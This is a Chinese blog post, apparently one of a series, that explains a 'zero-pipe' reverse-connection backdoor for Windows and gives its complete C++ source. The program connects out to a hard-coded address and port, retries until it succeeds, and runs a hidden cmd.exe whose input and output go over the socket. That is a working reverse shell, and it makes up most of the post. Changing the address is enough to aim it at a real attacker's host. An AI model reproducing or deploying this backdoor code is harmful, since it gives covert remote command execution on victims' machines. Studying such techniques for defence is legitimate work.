安全之路 —— 零管道反向连接后门解析

简介

根据前面两篇Blog介绍的双管道后门单管道后门,他们的特点是一定需要建立管道以便进行进程间通信。但是能不能不需要管道呢?答案是可以的,这里需要借鉴重叠IO的思想,将程序中的socket函数替换成支持重叠IO的WSASocket函数。

核心知识点

si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sSock;

即将Socket直接绑定到cmd进程的输入输出上,实现无管道。(siSTARTUPINFO

C++代码样例

/*
*@Author: PeterZ
*@Time: 2018/03/04
*@Function: 零管道反向连接后门(Default_Port: 4399)
*/

#include <iostream>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <WinSock2.h>
#include <winsock.h>
#include <windows.h>

using namespace std;

#pragma comment(lib,"ws2_32")

const CHAR* REMOTE_ADDR = "127.0.0.1";
const DWORD REMOTE_PORT = 4399;
const DWORD MAXSTR = 255;
const DWORD READLEN = 4096;

void StartShell(SOCKET sSock)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    CHAR cmdline[MAXSTR] = { 0 };
    GetStartupInfo(&si);
    si.cb = sizeof(STARTUPINFO);
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sSock;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    GetSystemDirectory(cmdline, MAXSTR);
    strcat_s(cmdline, MAXSTR, "\\cmd.exe");
    while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))
    {
        Sleep(1000);
    }
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return;
}

int APIENTRY WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    SOCKADDR_IN sin;
    WSADATA wsd;
    SOCKET sSock;
    CHAR readBuf[READLEN] = { 0 };
    DWORD realRecv = 0;
    const CHAR * welRow = "=====> Hello,Guy ~ <=====\r\n\r\n";
    int cRet;
    if (WSAStartup(0x0202, &wsd) == SOCKET_ERROR) return 0;
    if ((sSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) == INVALID_SOCKET) return 0;
    sin.sin_addr.S_un.S_addr = inet_addr(REMOTE_ADDR);
    sin.sin_port = htons(REMOTE_PORT);
    sin.sin_family = AF_INET;
    do
    {
        cRet = connect(sSock, (sockaddr*)&sin, sizeof(sin));
    } while (cRet == SOCKET_ERROR);
    send(sSock, welRow, strlen(welRow), 0);
    StartShell(sSock);
    closesocket(sSock);
    WSACleanup();
    return 0;
}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值